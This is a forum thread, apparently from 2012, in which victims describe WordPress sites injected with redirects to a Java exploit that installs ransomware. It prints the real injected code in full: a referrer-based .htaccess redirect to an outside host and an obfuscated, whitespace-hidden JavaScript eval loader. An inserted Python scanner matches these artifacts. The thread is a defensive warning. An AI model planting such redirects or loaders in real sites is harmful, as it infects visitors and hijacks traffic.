
BEWARE! Do You Use W3 Total Cache? Java 7?

Discussion in 'Blogging' started by sforzando, Dec 31, 2012.

  1. sforzando

    sforzando Jr. VIP Jr. VIP Premium Member

    Joined:
    May 27, 2011
    Messages:
    368
    Likes Received:
    120
    If you have the W3 Total Cache WordPress plugin, you need to update it. Any old version is exploitable and the attacker would have full access: http://www.techspot.com/news/51189-...dpress-plugin-exposes-site-database-info.html

    Similarly, Java 7 is exploitable, and the attacker can run any code from a web browser to install malware:
    http://threatpost.com/en_us/blogs/new-java-zero-day-being-used-targeted-attacks-082712
    Apparently if you update you should be OK, but I didn't want to risk that so I DOWNGRADED to Java 6. I uninstalled Java and then downloaded Java 6 Update 37:
    http://www.oldapps.com/java.php

    Yesterday, all of my WordPress domains were injected with redirect codes to a site that ran a Java exploit to install ransomware. I was freaked out because I had this fake Department of Justice ransomware that locked my computer and asked for money, and because my sites were losing some ranking due to the redirects. I had to start my computer in "Safe Mode with Networking" and follow the tutorial:
    http://malwaretips.com/blogs/department-of-justice-virus/

    The redirect codes were in every .htaccess file, as well as every header.php file I had:

    .htaccess
    Code:
    #336988#
    <IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteCond  %{HTTP_REFERER}   ^.*(abacho|abizdirectory|about|acoon|alexana|allesklar|allpages|allthesites|alltheuk|alltheweb|altavista|america|amfibi|aol|apollo7|aport|arcor|ask|atsearch|baidu|bellnet|bestireland|bhanvad|bing|blog|bluewin|botw|brainysearch|bricabrac|browseireland|chapu|claymont|click4choice|clickey|clickz|clush|confex|cyber-content|daffodil|devaro|dmoz|dogpile|ebay|ehow|eniro|entireweb|euroseek|exalead|excite|express|facebook|fastbot|filesearch|findelio|findhow|finditireland|findloo|findwhat|finnalle|finnfirma|fireball|flemiro|flickr|freenet|friendsreunited|galaxy|gasta|gigablast|gimpsy|globalsearchdirectory|goo|google|goto|gulesider|hispavista|hotbot|hotfrog|icq|iesearch|ilse|infoseek|ireland-information|ixquick|jaan|jayde|jobrapido|kataweb|keyweb|kingdomseek|klammeraffe|km|kobala|kompass|kpnvandaag|kvasir|libero|limier|linkedin|live|liveinternet|lookle|lycos|mail|mamma|metabot|metacrawler|metaeureka|mojeek|msn|myspace|netscape|netzindex|nigma|nlsearch|nol9|oekoportal|openstat|orange|passagen|pocketflier|qp|qq|rambler|rtl|savio|schnellsuche|search|search-belgium|searchers|searchspot|sfr|sharelook|simplyhired|slider|sol|splut|spray|startpagina|startsiden|sucharchiv|suchbiene|suchbot|suchknecht|suchmaschine|suchnase|sympatico|telfort|telia|teoma|terra|the-arena|thisisouryear|thunderstone|tiscali|t-online|topseven|twitter|ukkey|uwe|verygoodsearch|vkontakte|voila|walhello|wanadoo|web|webalta|web-archiv|webcrawler|websuche|westaustraliaonline|wikipedia|wisenut|witch|wolong|ya|yahoo|yandex|yell|yippy|youtube|zoneru)\.(.*)
    RewriteRule ^(.*)$ http://arttresci.com/esd.php [R=301,L]
    </IfModule>
    
    #/336988#
    header.php
    PHP:
    <?
    /*336988*/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
    try{window.document.body++}catch(gdsgsdg){dbshre=30;}if(dbshre){asd=0;try{d=document.createElement("div");d.innerHTML.a="asd";}catch(agdsg){asd=1;}if(!asd){e=eval;}ss=String;asgq=new      Array(31,94,110,104,94,107,97,104,104,27,31,33,25,117,8,1,24,25,26,27,109,89,107,26,104,113,24,54,26,95,102,91,110,103,96,101,108,39,93,109,92,89,109,95,64,99,93,102,95,105,107,32,32,99,97,105,89,102,95,34,32,51,6,4,8,1,24,25,26,27,100,114,39,109,109,90,24,54,26,34,95,108,109,106,53,38,39,90,108,111,107,106,94,109,94,96,38,92,105,104,38,93,108,94,41,103,96,105,33,54,4,2,25,26,27,23,101,115,40,110,107,113,101,95,41,103,103,108,99,111,96,103,103,26,56,23,31,90,92,110,102,100,110,110,96,30,51,6,4,27,23,24,25,103,117,37,107,109,115,103,92,38,91,105,109,91,93,107,26,56,23,31,41,33,54,4,2,25,26,27,23,101,115,40,110,107,113,101,95,41,95,93,98,97,99,107,24,54,26,34,40,104,113,33,54,4,2,25,26,27,23,101,115,40,110,107,113,101,95,41,110,97,93,110,99,23,53,25,33,44,103,112,32,53,8,1,24,25,26,27,100,114,39,109,111,112,100,94,40,103,92,94,109,26,56,23,31,42,106,115,30,51,6,4,27,23,24,25,103,117,37,107,109,115,103,92,38,109,105,107,23,53,25,33,44,103,112,32,53,8,1,5,3,26,27,23,24,98,96,27,31,25,93,105,94,108,101,94,104,111,37,95,94,110,64,99,93,102,95,105,107,58,114,67,95,31,31,102,116,34,32,33,25,117,8,1,24,25,26,27,23,24,25,26,95,102,91,110,103,96,101,108,39,113,109,96,108,94,34,34,51,92,98,112,27,96,92,54,86,34,100,114,85,33,57,51,39,93,99,113,53,31,34,53,8,1,24,25,26,27,23,24,25,26,95,102,91,110,103,96,101,108,39,97,96,107,61,101,95,104,92,102,109,60,116,64,92,33,33,104,113,31,34,40,92,103,104,94,104,95,58,96,98,102,95,31,101,115,35,54,4,2,25,26,27,23,117,6,4,120,32,32,34,53);s="";for(i=0;i-454!=0;i++){if((020==0x10)&&window.document)s+=ss["fromCharCode"](1*asgq[i]-(i%5-5-4));}z=s;e(s);}
    /*/336988*/
    ?>
     
    • Thanks x 3
    Last edited: Dec 31, 2012
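As an added example (this is not code from the thread or from any of the projects named in it), the Python script below walks a WordPress install and flags the two artifacts sforzando posted: the `.htaccess` block wrapped in `#336988#` / `#/336988#` tags that 301-redirects only visitors arriving from a search engine or social site, and the `header.php` block wrapped in `/*336988*/` / `/*/336988*/` tags that hides a `fromCharCode`-decoded, `eval`-fed JavaScript loader behind a wall of whitespace. The file names it inspects, the placeholder redirect host `attacker.invalid`, and the thresholds (10 referrer names, 40 array entries, 200 spaces of padding) are assumptions chosen for the example, and the sample files it scans are constructed, shortened versions of the posted injection.

```python
"""Scan a WordPress tree for the .htaccess / header.php injection posted above.
Added example; file names, paths and thresholds are assumptions."""
import os
import re
import tempfile
from typing import Dict, List

# Attacker's wrapper tags from the posted samples: the number is arbitrary, but the
# open and close tags share it, which makes the pair easy to match.
HTACCESS_TAG = re.compile(r"^#(\d{4,})#[ \t]*$.*?^#/\1#", re.M | re.S)
PHP_TAG = re.compile(r"/\*(\d{4,})\*/.*?/\*/\1\*/", re.S)

# Referrer-conditional redirect: only visitors arriving from a search engine or
# social site are bounced, so the owner typing the URL directly never sees it.
REFERER_COND = re.compile(
    r"RewriteCond\s+%\{HTTP_REFERER\}\s+\^\.\*\((?:[\w-]+\|){10,}[\w-]+\)", re.I)
EXTERNAL_301 = re.compile(
    r"RewriteRule\s+\S+\s+(https?://[^\s\[]+)\s*\[[^\]]*R=30[12]", re.I)

# Obfuscated dropper: a wall of spaces pushes the code off-screen in an editor,
# then a numeric array is decoded with String.fromCharCode and fed to eval.
LONG_PADDING = re.compile(r"^[ \t]{200,}$", re.M)
NUMERIC_ARRAY = re.compile(r"new\s+Array\((?:\d+,){40,}\d+\)")

SUSPECT_NAMES = {".htaccess", "header.php", "index.php", "footer.php"}  # assumed targets


def scan_htaccess(text: str) -> List[str]:
    """Findings for the contents of one .htaccess file."""
    findings = []
    m = HTACCESS_TAG.search(text)
    if m:
        findings.append(f"wrapper tag #{m.group(1)}# ... #/{m.group(1)}#")
    if REFERER_COND.search(text):
        findings.append("RewriteCond on HTTP_REFERER listing many search engines")
    m = EXTERNAL_301.search(text)
    if m:
        findings.append(f"RewriteRule redirecting to external URL {m.group(1)}")
    return findings


def scan_php(text: str) -> List[str]:
    """Findings for the contents of one PHP template file."""
    findings = []
    m = PHP_TAG.search(text)
    if m:
        findings.append(f"wrapper tag /*{m.group(1)}*/ ... /*/{m.group(1)}*/")
    if LONG_PADDING.search(text):
        findings.append("line of 200+ spaces (payload pushed off-screen)")
    if NUMERIC_ARRAY.search(text) and "fromCharCode" in text and re.search(r"\beval\b", text):
        findings.append("numeric array decoded via fromCharCode and passed to eval")
    return findings


def scan_tree(root: str) -> Dict[str, List[str]]:
    """Walk a WordPress install and map each suspicious file path to its findings."""
    report: Dict[str, List[str]] = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name not in SUSPECT_NAMES:
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                text = fh.read()
            hits = scan_htaccess(text) if name == ".htaccess" else scan_php(text)
            if hits:
                report[path] = hits
    return report


# Constructed samples modelled on the posted injection (lists shortened, redirect
# target replaced by the placeholder host attacker.invalid).
SAMPLE_HTACCESS = """#336988#
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond  %{HTTP_REFERER}   ^.*(aol|ask|baidu|bing|dogpile|facebook|google|lycos|msn|twitter|yahoo|yandex)\\.(.*)
RewriteRule ^(.*)$ http://attacker.invalid/esd.php [R=301,L]
</IfModule>

#/336988#
"""
CLEAN_HTACCESS = "# BEGIN WordPress\n<IfModule mod_rewrite.c>\nRewriteEngine On\n</IfModule>\n"
SAMPLE_HEADER_PHP = (
    "<?\n/*336988*/\n" + " " * 400 + "\n"
    + "try{window.document.body++}catch(x){d=30;}if(d){e=eval;ss=String;asgq=new Array("
    + ",".join(str(30 + i % 90) for i in range(120)) + ');s="";'
    + 'for(i=0;i<120;i++){s+=ss["fromCharCode"](asgq[i]);}e(s);}\n/*/336988*/\n?>\n'
)


def demo() -> Dict[str, List[str]]:
    """Write the samples into a temp dir, scan it, return paths relative to the root."""
    root = tempfile.mkdtemp(prefix="wp_scan_")
    theme = os.path.join(root, "wp-content", "themes", "twentytwelve")
    os.makedirs(theme)
    with open(os.path.join(root, ".htaccess"), "w") as fh:
        fh.write(SAMPLE_HTACCESS)
    with open(os.path.join(theme, "header.php"), "w") as fh:
        fh.write(SAMPLE_HEADER_PHP)
    return {os.path.relpath(p, root): h for p, h in scan_tree(root).items()}
```

Run `scan_tree()` against the document root of each WordPress install rather than relying on a browser check: the injected rule only fires when the `Referer` header names a search engine, so opening the site by typing its URL shows nothing. After cleaning a hit, the thread's later posts apply just as much as the scan: the files keep coming back until the credentials the attacker logged in with (FTP, WordPress, cPanel) are changed.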
  2. nativepro

    nativepro Power Member

    Joined:
    Jan 30, 2010
    Messages:
    536
    Likes Received:
    533
    One of my WordPress sites was hit with the exact same thing.
     
  3. abbiejenkins

    abbiejenkins Newbie

    Joined:
    Dec 24, 2012
    Messages:
    33
    Likes Received:
    3
    That's funny. I was visiting a blog I go to almost every day and I saw that same Department of Justice thing pop up. I was wondering what that was all about. I always try to update everything on WP, but I didn't think that plugins could leave such vulnerabilities. I'll definitely be making sure to update all plugins after reading this.
     
  4. AgentD

    AgentD Newbie

    Joined:
    Jan 1, 2013
    Messages:
    4
    Likes Received:
    0
    Wait a minute here, the SAME exact thing happened to me too. On the 23rd I was randomly surfing some website when suddenly my computer locked up and the Department of Justice screen froze everything; even my webcam turned on. I took some steps to get rid of it and left home for Christmas. I came back on the 26th to a dead server with a bunch of malicious code injected on various accounts/websites, EXACTLY like the one you posted. The whole .htaccess/header.php redirect. Yes, my websites were WordPress as well. One of them wasn't, and it still got compromised. While I was investigating the issue, my computer locked up and I freaked out. I reinstalled my OS and reformatted my HDD to completely get rid of the virus. I cleaned up my server and decided to switch hosts for my main site. I was offline for 6 days and the repercussions upset me. I don't receive as much revenue from Google AdSense anymore, and my Google Analytics stats dropped by half. I am now on a new server, with a brand new WordPress database, and I still feel something is wrong, as if a percentage of my traffic is being redirected. Is there any way to tell? Perhaps I am being paranoid and the 6 days of downtime were the cause, but the thing that made me want to post in here is that my WordPress sites weren't using the plugins you mentioned. They got in somehow, and a faulty plugin doesn't convince me. Something's up.
     
  5. sforzando

    sforzando Jr. VIP Jr. VIP Premium Member

    Joined:
    May 27, 2011
    Messages:
    368
    Likes Received:
    120
    I feel for you, man. Luckily I had experience with this before, so I didn't lose too much revenue from AdSense. Last year there was a similar exploit for a "timthumb.php" file, which is common in many plugins and themes. Try installing http://wordpress.org/extend/plugins/timthumb-vulnerability-scanner/ on every WordPress installation to check if you have any outdated timthumb.php files. Update all your plugins and WordPress. Disable and delete any plugins you don't use. Install WordPress Firewall 2: http://wordpress.org/extend/plugins/wordpress-firewall-2/ or whatever security plugin you like.

    I'm pretty sure the attackers run automated scripts to find sites that have outdated timthumb.php, old WP versions, and old W3 Total Cache versions, and automatically inject their code. I'd change my WordPress login passwords, FTP, cPanel, etc. just in case the attacker logged those. Have your rankings declined from the redirects? My site took a hit, but after I removed the redirect it went back to its original ranking.
     
  6. sforzando

    sforzando Jr. VIP Jr. VIP Premium Member

    Joined:
    May 27, 2011
    Messages:
    368
    Likes Received:
    120
    A Hostgator admin responded to my ticket when I asked how the attacker got in. Apparently the attacker logged in via FTP, so I know what happened:

    1. I visited a page about 5 days ago with the Java 7 exploit, and it installed the DOJ ransomware + a password sniffer.
    2. I removed the ransomware from my computer and thought that was the end of it.
    3. The attacker logged into FTP and injected the redirects.
    4. I visited my page, got redirected, and got the exact same virus again.

    So yeah, you'd better change all your passwords that you use on your computer. They like to use emails to send spam to your contacts.
     
  7. kideze

    kideze Elite Member

    Joined:
    Jun 23, 2009
    Messages:
    1,719
    Likes Received:
    330
    Location:
    the GRAND valley
    That webcam shit is scary.
     
  8. oscaroxy

    oscaroxy Newbie

    Joined:
    Jan 17, 2013
    Messages:
    2
    Likes Received:
    0
    I've had the same virus. I'm from Italy, so the virus that blocked my PC said "Polizia di stato"; it's the same as your virus. I removed it from my PC, but it has infected all my WordPress sites, and now every day I must clean the .htaccess, index.php and header.php on all my WordPress sites.
    I should say that I'll format my PC (even though Avast has deleted all the viruses from it), but now how do I remove this virus from my WordPress sites?
    I read your advice: reinstall WordPress, change passwords, install a scanner plugin, but I don't have a backup of the files...
    Help me, thanks
     
  9. irmscher

    irmscher Jr. VIP Jr. VIP Premium Member

    Joined:
    Sep 18, 2011
    Messages:
    660
    Likes Received:
    128
    Thanks for the heads up! There was even a notification in WP admin about security issues in the old versions; I hope it's fixed properly in the updated version. After I saw some posts here I thought... probably I should renew my Kaspersky subscription :)
     
  10. blue_wings

    blue_wings Newbie

    Joined:
    Feb 2, 2011
    Messages:
    47
    Likes Received:
    71
    Location:
    Romania
    Actually, you would be secure even with that insecure W3TC plugin if you have hardened your hosting account security. One of the first things I do after installing WordPress or any other CMS is to add some rules to the .htaccess file. This is the one I am talking about:

    Options -Indexes


    With that one, no one can browse through your folders on your hosting account. So they cannot get the DB cache unless they can guess the hashes in the names... which look like this:
     
  11. oscaroxy

    oscaroxy Newbie

    Joined:
    Jan 17, 2013
    Messages:
    2
    Likes Received:
    0
    In your opinion, if I give .htaccess 444 permissions and block the chmod function in PHP (disable_functions in php.ini), can I fix my infected WordPress site?

    Now every day, or at most after a few days (2 or 3), I find the trojan again in my .htaccess, index.php and header.php.

    thanks
     
    Last edited: Jan 18, 2013